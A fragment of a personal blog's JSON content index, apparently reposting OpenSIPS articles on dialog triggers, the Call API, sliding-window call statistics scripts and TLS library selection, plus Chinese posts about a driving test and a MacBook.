xlog(\u0026#34;[$DLG_id] call terminated after $DLG_lifetime seconds with a cost of $dlg_val(total_cost)\\n\u0026#34;); # IMPROVEMENT - eventually adjust the cost if the call didn\u0026#39;t use # the whole span of the last 5 seconds } ","permalink":"https://wdd.js.org/opensips/blog/dialog-trigers/","summary":"原文:https://blog.opensips.org/2020/05/26/dialog-triggers-or-how-to-control-the-calls-from-script/\nThe OpenSIPS script is a very powerful tool, both in terms of capabilities (statements, variables, transformations) and in terms of integration (support for DB, REST, Events and more). So why not use the OpenSIPS script (or the script routes) to interact and control your call, in order to build more complex services on top of the dialog support? For this purpose, OpenSIPS 3.1 introduces three new per-dialog triggers:\non_answer route, triggered when the dialog is answered; on_timeout route, triggered when the dialog is about to timeout; on_hangup route, triggered after the dialog was terminated.","title":"Dialog triggers, or how to control the calls from script"},{"content":" 看来OpenSIPS的目标已经不仅仅局限于做代理了,而是想做呼叫控制。\n原文:https://blog.opensips.org/2020/06/11/calls-management-using-the-new-call-api-tool/\nThe new Call API project consists of a standalone server able to serve a set of API commands that can be used to control SIP calls (such as start a new call, put a call on hold, transfer it to a different destination, etc.). In order to provide high performance throughput, the server has been developed in the Go programming language, and provides a WebSocket interface that is able to handle Json-RPC 2.0 requests and notifies. Although it runs as a standalone daemon able to control calls, it does not directly interact with SIP calls, but just communicates with a SIP proxy that actually provides the SIP stack and intermediates the calls. 
The first release of the Call API is using OpenSIPS for this purpose, but this is a loose requirement – in the future other SIP stacks can be used, with the appropriate connectors.\nArchitecture In terms of architecture, the new Call API tool consists of multiple units, the most important ones being:\nClients interface – this unit is responsible for receiving Json-RPC requests over WebSocket from clients and passing them to the Commands unit Management interface – this is the unit that communicates with the SIP proxy in order to instruct it what needs to be done Event interface – listens for events from the SIP proxy and passes them to the Commands unit Commands unit – this is the unit that implements the commands logic, ensuring the interaction between all the above interfaces. Communication between these units is done asynchronously using goroutines. Below you can find a diagram that shows how all these units are interconnected.\nDemo Below you can watch a video that shows how you can use some of the features the Call API tool provides, such as:\nStart a call between two participants Put the call on hold Resume the call from hold Transfer a call to a different destination Terminate an ongoing call Enjoy watching!\n","permalink":"https://wdd.js.org/opensips/blog/calls-manager/","summary":"看来OpenSIPS的目标已经不仅仅局限于做代理了,而是想做呼叫控制。\n原文:https://blog.opensips.org/2020/06/11/calls-management-using-the-new-call-api-tool/\nThe new Call API project consists of a standalone server able to serve a set of API commands that can be used to control SIP calls (such as start a new call, put a call on hold, transfer it to a different destination, etc.). 
In order to provide high performance throughput, the server has been developed in the Go programming language, and provides a WebSocket interface that is able to handle Json-RPC 2.","title":"Calls management using the new Call API tool"},{"content":" 早期1x和2x版本的OpenSIPS,统计模块只有两种模式,一种是计算值,另一种是从运行开始的累加值。而无法获取比如说最近一分钟,最近5分钟,这样的基于一定周期的统计值,在OpenSIPS 3.2上,提供了新的解决方案。\n原文:https://blog.opensips.org/2021/02/02/improved-series-based-call-statistics-using-opensips-3-2/\nReal-time call statistics is an excellent tool to evaluate the quality and performance of your telephony platform, which is why it is very important to expose as many statistics as possible, accumulated over different periods of time.OpenSIPS provides an easy-to-use interface that exposes simple primitives for creating, updating, and displaying various statistics, both well defined as well as tailored to your needs. However, the current implementation comes with a limitation: statistics are gathered starting from the beginning of the execution, up to the point they are read. In other words, you cannot gather statistics only for a limited time frame.That is why starting with OpenSIPS 3.2, the statistics module was enhanced with a new type of statistics, namely statistics series, that allow you to provide custom stats accumulated over a specific time window (such as one second, one minute, one hour, etc.). When the stat is evaluated, only the values gathered within the specified time window are accounted, all the others are simply dropped (similar to a time-based circular buffer, or a sliding window). 
Using these new stats, you can easily provide standard statistics such as ACD, AST, PDD, ASR, NER, CCR in a per minute/hour fashion.\nProfiles In order to use the statistics series you first need to define a statistics profile, which describes certain properties of the statistics to be used, such as:\nthe duration of the time frame to be used – the number of seconds worth of data that should be accumulated for the statistics that use this profile; all data gathered outside of this time window is discarded the granularity of the time window – the number of slots used for each series – the more slots, the more accurate the statistic is, with a penalty of an increased memory footprint how to group statistics to make them easier to process the processing algorithm – or how data should be accumulated and interpreted when the statistic is evaluated; this is presented in the next chapter The profile needs to be specified every time data is pushed into a statistics series, so that the engine knows how to process it.\nAlgorithms The statistics series algorithms describe how the data gathered over the specified time window should be processed. 
There are several algorithms available:\naccumulate – this is useful when you want to count the number of times a specific event appears (such as the number of requests, replies, dialogs, etc.); for this algorithm, the statistic is represented as a simple counter that accumulates when data is fed, and is decreased when data (out of the sliding window) expires average – this is used to compute an average value over the entire window frame; this is useful to compute the average call duration (ACD) or average post dial delay (PDD) over a specified time window percentage – used to compute the percentage of some data out of a total number of entries; useful to compute different types of ratios, such as the Answer-Seizure Ratio (ASR), NER or CCR Usage The new functionality can be leveraged by defining one (or more) stat_series_profiles, and then feeding data to that statistic according to your script’s logic using the update_stat_series() function. In order to evaluate the result of the stats, one can use the $stat() variable from within OpenSIPS’s script, or access it from outside using the get_statistics MI command.As a quick theoretical example, let us consider creating two statistics: one that counts the number of initial INVITE requests per minute your platform receives, and another one that shows the ratio of the INVITE requests out of all the other requests received.First, we shall define the two profiles that describe how the new statistics should be interpreted: the first one should be a counter that accumulates all the initial INVITEs received in one minute, and the second one should be a percentage series that is incremented for initial INVITEs, and decremented for all the others. 
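Before looking at the OpenSIPS configuration, the sliding-window behaviour of the accumulate algorithm can be sketched in a few lines of plain Python. This is only an illustration of the concept (the class and method names are invented for the example), not OpenSIPS's actual implementation:

```python
from collections import deque

class SlidingWindowStat:
    # accumulate algorithm over a time window: samples older than the
    # window are expired before each read, much like the time-based
    # circular buffer described above
    def __init__(self, window_seconds):
        self.window = window_seconds
        self.samples = deque()  # (timestamp, value) pairs, oldest first

    def update(self, now, value):
        self.samples.append((now, value))

    def read(self, now):
        # drop samples that fell out of the sliding window
        while self.samples and self.samples[0][0] <= now - self.window:
            self.samples.popleft()
        return sum(v for _, v in self.samples)
```

For example, with a 60-second window and one update at t=0, t=30 and t=70, reading at t=70 yields 2: the t=0 sample has expired, just as a per-minute INVITE counter forgets requests older than one minute.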
Both statistics series will use a 60s (one minute) window:\nmodparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_series_profile\u0026#34;, \u0026#34;inv_acc_per_min: algorithm=accumulate window=60\u0026#34;) modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_series_profile\u0026#34;, \u0026#34;inv_perc_per_min: algorithm=percentage window=60\u0026#34;) Now, in the main route, we shall update the statistics with data:\nroute { ... if (is_method(\u0026#34;INVITE\u0026#34;) \u0026amp;\u0026amp; !has_totag()) { update_stat_series(\u0026#34;inv_acc_per_min\u0026#34;, \u0026#34;INVITE_per_min\u0026#34;, \u0026#34;1\u0026#34;); update_stat_series(\u0026#34;inv_perc_per_min\u0026#34;, \u0026#34;INVITE_ratio\u0026#34;, \u0026#34;1\u0026#34;); } else { update_stat_series(\u0026#34;inv_perc_per_min\u0026#34;, \u0026#34;INVITE_ratio\u0026#34;, \u0026#34;-1\u0026#34;); } xlog(\u0026#34;INVITEs per min $stat(INVITE_per_min) represents $stat(INVITE_ratio)% of total requests\\n\u0026#34;); ... } You can query these statistics through the MI interface by running:\nopensips-cli -x mi get_statistics INVITE_per_min INVITE_ratio\nUse case In a production environment, the KPIs you provide your customers are very important, as they describe the quality of the service you provide. Some of these are quite standard indices (ACD, ASR, AST, PDD, NER, CCR), that are relevant for specific periods of time (one minute, ten minutes, one hour). In the following paragraphs we will see how we can provide these statistics on a per-customer basis, as well as overall.First, we need to understand what each stat represents, to understand the logic that has to be scripted:\nASR (Answer Seizure Ratio) – the percentage of telephone calls which are answered (200 reply status code) CCR (Call Completion Ratio) – the percentage of telephone calls which are signaled back by the far-end client. 
Thus, 5xx, 6xx reply codes and internal 408 timeouts generated before reaching the client do not count here. The following is always true: CCR \u0026gt;= ASR PDD (Post Dial Delay) – the duration, in milliseconds, between the receipt of the initial INVITE and the receipt of the first 180/183 provisional reply (the call state advances to “ringing”) AST (Average Setup Time) – the duration, in milliseconds, between the receipt of the initial INVITE and the receipt of the first 200 OK reply (the call state advances to “answered”). The following is always true: AST \u0026gt;= PDD ACD (Average Call Duration) – the duration, in seconds, between the receipt of the initial INVITE and the receipt of the first BYE request from either participant (the call state advances to “ended”) NER (Network Effectiveness Ratio) – measures the ability of a server to deliver the call to the called terminal; in addition to ASR, NER also considers busy and user failures as success Now that we know what we want to see, we can start scripting: we need to load the statistics module, and define two types of profiles: one that computes average indices (used for AST, PDD, ACD), and one for percentage indices (used for ASR, NER, CCR). 
For each of them, we define 3 different time windows: per minute, per 10 minutes and per hour:\nloadmodule \u0026#34;statistics.so\u0026#34; modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_series_profile\u0026#34;, \u0026#34;perc: algorithm=percentage group=stats\u0026#34;) modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_series_profile\u0026#34;, \u0026#34;10m-perc: algorithm=percentage window=600 slots=10 group=stats_10m\u0026#34;) modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_series_profile\u0026#34;, \u0026#34;1h-perc: algorithm=percentage window=3600 slots=6 group=stats_1h\u0026#34;) modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_series_profile\u0026#34;, \u0026#34;avg: algorithm=average group=stats\u0026#34;) modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_series_profile\u0026#34;, \u0026#34;10m-avg: algorithm=average window=600 slots=10 group=stats_10m\u0026#34;) modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_series_profile\u0026#34;, \u0026#34;1h-avg: algorithm=average window=3600 slots=6 group=stats_1h\u0026#34;) In order to catch all the relevant events we need to hook on, we will be using the E_ACC_CDR and E_ACC_MISSED_EVENT events exposed by the accounting module. In order to identify the customer that the events were triggered for, we need to export the customer’s identifier in the event:\nloadmodule \u0026#34;acc.so\u0026#34; modparam(\u0026#34;acc\u0026#34;, \u0026#34;extra_fields\u0026#34;,\u0026#34;evi: customer\u0026#34;) route { ... if (!has_totag() \u0026amp;\u0026amp; is_method(\u0026#34;INVITE\u0026#34;)) { do_accounting(\u0026#34;evi\u0026#34;, \u0026#34;cdr|missed\u0026#34;); t_on_reply(\u0026#34;stats\u0026#34;); # store the moment the call started get_accurate_time($avp(call_start_s), $avp(call_start_us)); # TODO: store the customer\u0026#39;s id in $acc_extra(customer) } ... 
} When a reply comes in, our “stats” reply route will be called, where we will update all the statistics, according to our logic. Because we need to compute them twice, once for the global statistics, and once for the customer’s, we will put the logic in a new route, “calculate_stats_reply”, that we call when a reply comes in:\nonreply_route[stats] { route(calculate_stats_reply, $avp(call_start_s), $avp(call_start_us), \u0026#34;\u0026#34;); route(calculate_stats_reply, $avp(call_start_s), $avp(call_start_us), $acc_extra(customer)); } route[calculate_stats_reply] { # expects: # - param 1: timestamp (in seconds) when the initial request was received # - param 2: timestamp (in microseconds) when the initial request was received # - param 3: statistic identifier; for global, empty string is used if ($rs == \u0026#34;180\u0026#34; || $rs == \u0026#34;183\u0026#34; || $rs == \u0026#34;200\u0026#34; || $rs == \u0026#34;400\u0026#34; || $rs == \u0026#34;403\u0026#34; || $rs == \u0026#34;408\u0026#34; || $rs == \u0026#34;480\u0026#34; || $rs == \u0026#34;487\u0026#34;) { if (!isflagset(\u0026#34;FLAG_PDD_CALCULATED\u0026#34;)) { get_accurate_time($var(now_s), $var(now_us)); ts_usec_delta($var(now_s), $var(now_us), $param(1), $param(2), $var(pdd_us)); $var(pdd_ms) = $var(pdd_us) / 1000; # milliseconds $avp(pdd) = $var(pdd_ms); setflag(\u0026#34;FLAG_PDD_CALCULATED\u0026#34;); } else { $var(pdd_ms) = $avp(pdd); } update_stat_series(\u0026#34;avg\u0026#34;, \u0026#34;PDD$param(3)\u0026#34;, $var(pdd_ms)); update_stat_series(\u0026#34;10m-avg\u0026#34;, \u0026#34;PDD_10m$param(3)\u0026#34;, $var(pdd_ms)); update_stat_series(\u0026#34;1h-avg\u0026#34;, \u0026#34;PDD_1h$param(3)\u0026#34;, $var(pdd_ms)); } if ($rs \u0026gt;= 200 \u0026amp;\u0026amp; $rs \u0026lt; 300) { update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;ASR$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;ASR_10m$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;1h-perc\u0026#34;, 
\u0026#34;ASR_1h$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;NER$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;NER_10m$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;NER_1h$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;CCR$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;CCR_10m$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;CCR_1h$param(3)\u0026#34;, 1); get_accurate_time($var(now_s), $var(now_us)); ts_usec_delta($var(now_s), $var(now_us), $param(1), $param(2), $var(ast_us)); $var(ast_us) = $var(ast_us) / 1000; # milliseconds update_stat_series(\u0026#34;avg\u0026#34;, \u0026#34;AST$param(3)\u0026#34;, $var(ast_us)); update_stat_series(\u0026#34;10m-avg\u0026#34;, \u0026#34;AST_10m$param(3)\u0026#34;, $var(ast_us)); update_stat_series(\u0026#34;1h-avg\u0026#34;, \u0026#34;AST_1h$param(3)\u0026#34;, $var(ast_us)); } } In case of a successful call, the dialog generates a CDR, that we use to update our ACD statistics:\nevent_route[E_ACC_CDR] { route(calculate_stats_cdr, $param(duration), $param(setuptime), \u0026#34;\u0026#34;); route(calculate_stats_cdr, $param(duration), $param(setuptime), $param(customer)); } route[calculate_stats_cdr] { # expects: # - param 1: duration (in seconds) of the call # - param 2: setuptime (in seconds) of the call # - param 3: optional - statistic identifier; global is empty string $var(total_duration) = $param(1) + $param(2); update_stat_series(\u0026#34;avg\u0026#34;, \u0026#34;ACD$param(3)\u0026#34;, $var(total_duration)); update_stat_series(\u0026#34;10m-avg\u0026#34;, \u0026#34;ACD_10m$param(3)\u0026#34;, $var(total_duration)); update_stat_series(\u0026#34;1h-avg\u0026#34;, \u0026#34;ACD_1h$param(3)\u0026#34;, $var(total_duration)); } And in case of a failure, we update the corresponding 
statistics:\nevent_route[E_ACC_MISSED_EVENT] { route(calculate_stats_failure, $param(code), \u0026#34;\u0026#34;); route(calculate_stats_failure, $param(code), $param(customer)); } route[calculate_stats_failure] { # expects: # - param 1: failure code # - param 2: statistic identifier; global is empty string update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;ASR$param(3)\u0026#34;, -1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;ASR_10m$param(3)\u0026#34;, -1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;ASR_1h$param(3)\u0026#34;, -1); if ($param(1) == \u0026#34;486\u0026#34; || $param(1) == \u0026#34;408\u0026#34;) { update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;NER$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;NER_10m$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;NER_1h$param(3)\u0026#34;, 1); } else { update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;NER$param(3)\u0026#34;, -1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;NER_10m$param(3)\u0026#34;, -1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;NER_1h$param(3)\u0026#34;, -1); } if ($(param(1){s.int}) \u0026gt; 499) { update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;CCR$param(3)\u0026#34;, -1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;CCR_10m$param(3)\u0026#34;, -1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;CCR_1h$param(3)\u0026#34;, -1); } else { update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;CCR$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;CCR_10m$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;CCR_1h$param(3)\u0026#34;, 1); } } And we are all set – all you have to do is to run traffic through your server, query the statistics (over MI) at your desired pace (such as every minute), and plot them nicely in a graph to improve your monitoring 
experience.\nPossible enhancements There is currently no way of persisting these statistics over a restart – this means that every time you restart, the new statistics have to be re-computed, resulting in possibly misleading results. In the future, it would be nice if we could provide some sort of persistent storage for them.All statistics are currently local, although it might be possible to aggregate values across multiple servers using some scripting + cluster broadcast messages from script. Ideally, we shall implement this in an automatic fashion using the clusterer module.Finally, although there are currently only three algorithms supported (accumulate, percentage and average), more can be added quite easily – we shall do that in future versions.Enjoy your new statistics!\n","permalink":"https://wdd.js.org/opensips/blog/call-stat/","summary":"早期1x和2x版本的OpenSIPS,统计模块只有两种模式,一种是计算值,另一种是从运行开始的累加值。而无法获取比如说最近一分钟,最近5分钟,这样的基于一定周期的统计值,在OpenSIPS 3.2上,提供了新的解决方案。\n原文:https://blog.opensips.org/2021/02/02/improved-series-based-call-statistics-using-opensips-3-2/\nReal-time call statistics is an excellent tool to evaluate the quality and performance of your telephony platform, which is why it is very important to expose as many statistics as possible, accumulated over different periods of time.OpenSIPS provides an easy-to-use interface that exposes simple primitives for creating, updating, and displaying various statistics, both well defined as well as tailored to your needs. 
However, the current implementation comes with a limitation: statistics are gathered starting from the beginning of the execution, up to the point they are read.","title":"Improved series-based call statistics using OpenSIPS 3.2"},{"content":" OpenSIPS和OpenSSL之间的集成总是存在各种各样的问题。我之前就遇到死锁的问题,OpenSIPS CPU占用很高,但是不再处理SIP消息。最终排查下来,是和OpenSSL有关。 深层次的原因,是因为OpenSIPS是个多进程的程序,而OpenSSL主要是面向多线程的程序。 在OpenSIPS3.2版本上,官方团队列出了几个OpenSSL的替代品,并进行优劣对比,最终选择一个比较好的方案。 我们一起来看看吧。\nFor the purpose of providing secure SIP communication over the TLS protocol, OpenSIPS uses the OpenSSL library, the most popular TLS implementation across the Internet. However, integrating OpenSSL with OpenSIPS has posed a series of challenges starting with OpenSSL version 1.1.0, and has caused quite a few bugs and crashes since then, as presented in more detail in this article.As such, for the new OpenSIPS 3.2 version, we have finally decided to provide support for an additional TLS library, as an alternative to OpenSSL. In this article, we are going to take a look at the options we have explored and the criteria and factors that we used to choose a candidate.\nIssues with OpenSSL Even though up to this point, we have been able to solve the encountered issues, new problems continue to emerge and there are still ongoing reports and GitHub tickets on this topic. The main reason for this, in short, is that OpenSSL is designed with multi-threaded applications in mind, and is incompatible with certain design principles of a multi-process application like OpenSIPS. 
OpenSSL is not intended to be used in an environment where TLS connections can be shared between multiple worker processes.\nRequirements for a new TLS library First, we considered the following general requirements for the new TLS library to use in OpenSIPS:\ncross-platform support, availability for many operating systems (ideally, through the default package repository); comprehensive, up-to-date documentation; support for the latest and widely used protocols and encryption algorithms; mature, lively project and good adoption. But more precisely, in order for a TLS library to be viable for OpenSIPS, in the light of our multi-process architecture constraints, we specifically look for:\nthread-safe design (in OpenSIPS we only have a single thread per process, but we do concurrently access the library from multiple processes nonetheless); hooks for providing custom memory allocation functions (instead of the system malloc() family), to make sure the TLS connection contexts are allocated in OpenSIPS shared memory, similarly to CRYPTO_set_mem_functions() in OpenSSL; hooks for providing custom locking mechanisms (primitives like create, lock, unlock mutex) in order to synchronize access between processes to the shared TLS connection contexts, similarly to the obsolete CRYPTO_set_locking_callback() in OpenSSL; no use of specific, per-thread memory zone storage mechanisms like Thread Local Storage (which OpenSSL adopted in version 1.1.1, and caused further crashes in OpenSIPS). 
Candidates In this section we are going to list the top candidates that we have identified in our search for the best TLS implementation that fits OpenSIPS and provide a short conclusion on the findings on each one.\nOpenSSL forks Even though prominent OpenSSL forks like LibreSSL (forked by the OpenBSD project from OpenSSL 1.0.1g) or BoringSSL (forked by Google) seem good options from other perspectives (like features or availability), they fail to bring, or keep from old OpenSSL, the required mechanisms for properly integrating with OpenSIPS. LibreSSL for example has dropped both CRYPTO_set_mem_functions() and CRYPTO_set_locking_callback().\nGnuTLS Popular among free and open source software, GnuTLS’s documentation on thread safety does not seem to indicate that it is safe to share TLS session objects between threads. Moreover, the library uses hard-coded mutex implementations (e.g., pthreads on GNU/Linux and CriticalSection on Windows) for several aspects, like random number generation (this operation has led to issues in OpenSSL). In terms of custom application hooks, GnuTLS does offer gnutls_global_set_mutex() for locking, but since version 3.3.0 has dropped gnutls_global_set_mem_functions() for memory allocation, which is a must for OpenSIPS shared memory.\nMbed TLS Formerly known as PolarSSL, MbedTLS is a library designed for embedded devices and, for the purpose of better integration with different systems, offers abstraction layers for memory allocation and threading mechanisms. OpenSIPS can take advantage of these features by installing its own handlers via mbedtls_platform_set_calloc_free() and mbedtls_threading_set_alt(). The downside in this case is that the customisations are only available if the library is compiled with specific flags, which are not enabled by default. 
This would mean that TLS in OpenSIPS would not properly work with the library installed directly from packages, which is not a desirable approach.\nWolfSSL Previously called yaSSL / CyaSSL, WolfSSL is a lightweight TLS library aimed at embedded devices. It has achieved high distribution volumes on all systems nevertheless, due to formerly being bundled with MySQL, as the default TLS implementation. As is the case with Mbed TLS, the library’s high portability design can be exploited for better integration with OpenSIPS. WolfSSL provides a hook for setting custom memory allocation functions through wolfSSL_SetAllocators() but does not offer a way to change the locking mechanism at runtime (unless compiled differently). However, the documentation and forum discussions on this matter suggest that as long as access to shared connection contexts is synchronised at the user application level, the library will not internally acquire any mutexes and no concurrency issues will arise.\nFinal choice Based on our evaluation of the available TLS libraries, WolfSSL seems to be a good TLS implementation overall and the most appropriate to work with OpenSIPS’s multi-process design and constraints. In conclusion, starting with OpenSIPS 3.2, we plan on providing the possibility of choosing between WolfSSL and OpenSSL for the TLS needs in OpenSIPS.\n参考:https://blog.opensips.org/2021/02/11/exploring-ssl-tls-libraries-for-opensips-3-2/\n","permalink":"https://wdd.js.org/opensips/blog/opensips3-tls/","summary":"OpenSIPS和OpenSSL之间的集成总是存在各种各样的问题。我之前就遇到死锁的问题,OpenSIPS CPU占用很高,但是不再处理SIP消息。最终排查下来,是和OpenSSL有关。 深层次的原因,是因为OpenSIPS是个多进程的程序,而OpenSSL主要是面向多线程的程序。 在OpenSIPS3.2版本上,官方团队列出了几个OpenSSL的替代品,并进行优劣对比,最终选择一个比较好的方案。 我们一起来看看吧。\nFor the purpose of providing secure SIP communication over the TLS protocol, OpenSIPS uses the OpenSSL library, the most popular TLS implementation across the Internet. 
However, integrating OpenSSL with OpenSIPS has posed a series of challenges starting with OpenSSL version 1.1.0, and has caused quite a few bugs and crashes since then, as presented in more detail in this article.As such, for the new OpenSIPS 3.","title":"Exploring SSL/TLS libraries for OpenSIPS 3.2"},{"content":"科目二倒库和四项练的差不多了,决定去参加考试,考试虽然一波三折,但结果还是好的,一次通过了\n考场熟悉 考场倒库有14个区,没什么好讲的。 四项有4个环线,每个环线上有两个考试线路,所以一共是8条线路 务必看懂各种符号的含义,例如曲线,侧方, 直角与坡道 【重点】当你知道你自己在哪条线上考试之后,务必对照着线路图,将四项的顺序以及位置牢记于心。虽然路上会有牌子指示下一项内容是什么,但是考试的时候,由于视线等各种原因可能不会去在意。也有人,看到前面是直角,就以为是前面是直角转弯,结果到了真正直角转弯的位置,却没有做直角相关的操作,导致考试失败。 例如,当你被选择到8号线的四项时,你到了7-8待考等待区后,等待自己的考试车。在等待过程中按照平面图,可以发现,离待考最近的起点之后,8号线,第一个考试项目侧方停车,然后是直角转弯,接着是S弯,最后是坡道。\n模拟考相关 模拟的费用以及项目内容 模拟的费用是360,包含以下内容\n倒车入库120,可以倒库3次 四项有八条线路,每个线路各跑一次 四项的车和倒库的车是不同的,这点需要注意。\n模拟考有用吗? 我觉得是有用的\n一般驾校只有一两条线路,实际考场有8条线路。每条线路你都可以跑一次,从1号线到8号线。跑过这8条线,你会基本知道自己四项中哪些项目比较容易出错。可以针对性加强。另外也可以找找坡道的点位。 跑模拟四项的时候,有个教练会坐在副驾驶上。他会不断的催促你,此时你千万不要让他的催促导致你连续的出错,进而影响到你考试的心态。你是交了钱的,离合和油门都在你这边,教练再催,也是没办法让车加速的。你不要怂。【注意:在真实考试时,副驾驶是没有人的。】 教练为什么要不停的催你,因为你越快跑完8条线路,他就可以接更多的学员,他手里的小票就越多,提成就越多。当你模拟完8条线路,教练会让你再买几条线路。线路其实是可以按条买的,每条线跑一次30块。真是车轮一转,家财万贯。车轮一响,黄金万两啊。 虽然倒库的车库有14个,但是你模拟的那个车库,其实有极大的可能就是你真实考试的那个车库。这样你就可以提前熟悉一下车库的点位。我比较菜,模拟三次的倒库都倒失败了。但是我从三次失败中也学到了自己失败的原因。从而在真实考试时成功通过。倒库如果你三次都失败了,也可以单独买的。倒3次60块。倒6次120块。但是这就不建议再花钱了。你应该记住自己的错误的点。比如是哪边压线了,然后回到驾校,和你的教练沟通一下。驾校的教练会给你更加有用的建议。另外你务必要记住自己是几号库,你只要和驾校教练沟通一下,他都知道这个库位的处理细节的。 如果我没有模拟考过,很可能我科目二第一次会挂,然后还要花时间去搞这件事。如果能用钱解决的事情,我更希望能节省一些时间。 心态 考试的心态很重要,和我一起参加考试的一个同学。他没有参加模拟考,但是他在考试中倒库一把就倒进去了。我认为他是比较牛逼的。但是有可能他骄傲了,挂在了几个转向灯和坡道定点上。侧方停车时,出库居然忘记打转向灯了。\n也有人忘记系安全带了。\n很多小的点,也很容易的点。在驾校都练的很熟练,但是一到考场,就总是丢三落四的忘记。为什么会有这种情况呢?\n因为心态变了。\n","permalink":"https://wdd.js.org/posts/2021/01/","summary":"科目二倒库和四项练的差不多了,决定去参加考试,考试虽然一波三折,但结果还是好的,一次通过了\n考场熟悉 考场倒库有14个区,没什么好讲的。 四项有4个环线,每个环线上有两个考试线路,所以一共是8条线路 务必看懂各种符号的含义,例如曲线,侧方, 直角与坡道 【重点】当你知道你自己在哪条线上考试之后,务必对照着线路图,将四项的顺序以及位置牢记于心。虽然路上会有牌子指示下一项内容是什么,但是考试的时候,由于视线等各种原因可能不会去在意。也有人,看到前面是直角,就以为是前面是直角转弯,结果到了真正直角转弯的位置,却没有做直角相关的操作,导致考试失败。 
例如,当你被选择到8号线的四项时,你到了7-8待考等待区后,等待自己的考试车。在等待过程中按照平面图,可以发现,离待考最近的起点之后,8号线,第一个考试项目侧方停车,然后是直角转弯,接着是S弯,最后是坡道。\n模拟考相关 模拟的费用以及项目内容 模拟的费用是360,包含以下内容\n倒车入库120,可以倒库3次 四项有八条线路,每个线路各跑一次 四项的车和倒库的车是不同的,这点需要注意。\n模拟考有用吗? 我觉得是有用的\n一般驾校只有一两条线路,实际考场有8条线路。每条线路你都可以跑一次,从1号线到8号线。跑过这8条线,你会基本知道自己四项中哪些项目比较容易出错。可以针对性加强。另外也可以找找坡道的点位。 跑模拟四项的时候,有个教练会坐在副驾驶上。他会不断的催促你,此时你千万不要让他的催促导致你连续的出错,进而影响到你考试的心态。你是交了钱的,离合和油门都在你这边,教练再催,也是没办法让车加速的。你不要怂。【注意:在真实考试时,副驾驶是没有人的。】 教练为什么要不停的催你,因为你越快跑完8条线路,他就可以接更多的学员,他手里的小票就越多,提成就越多。当你模拟完8条线路,教练会让你再买几条线路。线路其实是可以按条买的,每条线跑一次30块。真是车轮一转,家财万贯。车轮一响,黄金万两啊。 虽然倒库的车库有14个,但是你模拟的那个车库,其实有极大的可能就是你真实考试的那个车库。这样你就可以提前熟悉一下车库的点位。我比较菜,模拟三次的倒库都倒失败了。但是我从三次失败中也学到了自己失败的原因。从而在真实考试时成功通过。倒库如果你三次都失败了,也可以单独买的。倒3次60块。倒6次120块。但是这就不建议再花钱了。你应该记住自己的错误的点。比如是哪边压线了,然后回到驾校,和你的教练沟通一下。驾校的教练会给你更加有用的建议。另外你务必要记住自己是几号库,你只要和驾校教练沟通一下,他都知道这个库位的处理细节的。 如果我没有模拟考过,很可能我科目二第一次会挂,然后还要花时间去搞这件事。如果能用钱解决的事情,我更希望能节省一些时间。 心态 考试的心态很重要,和我一起参加考试的一个同学。他没有参加模拟考,但是他在考试中倒库一把就倒进去了。我认为他是比较牛逼的。但是有可能他骄傲了,挂在了几个转向灯和坡道定点上。侧方停车时,出库居然忘记打转向灯了。\n也有人忘记系安全带了。\n很多小的点,也很容易的点。在驾校都练的很熟练,但是一到考场,就总是丢三落四的忘记。为什么会有这种情况呢?\n因为心态变了。","title":"南京尧新科目二考试考试回顾"},{"content":"我的macbook是2017买的, 使用到今天大概1204天。\n最初的使用体验是\n触摸板很灵敏 屏幕很高清 系统很流畅 三年中出现过的问题\n键盘中的几个按键出现过问题,按键不灵敏。17年是用的蝴蝶键盘,这个键盘问题很多。最新版已经换成了剪刀脚键盘了。 屏幕老化,屏幕的四周出现淡红色的红晕,但是不影响使用。 如果不充电的情况下,掉电蛮快的,而且有时候电量还很多,就自动关机。 现在的感觉:\n触摸板我基本不会用了,因为大部分时间我都是用键盘可以搞定一切。因为我用了vim编辑器。 我也不再使用macbook pro自带的键盘,因为真是不好用。所有的笔记本键盘,除了thinkpad的键盘。都不太好用,不适合长时间打字。所以我用了外接的静电容键盘。 
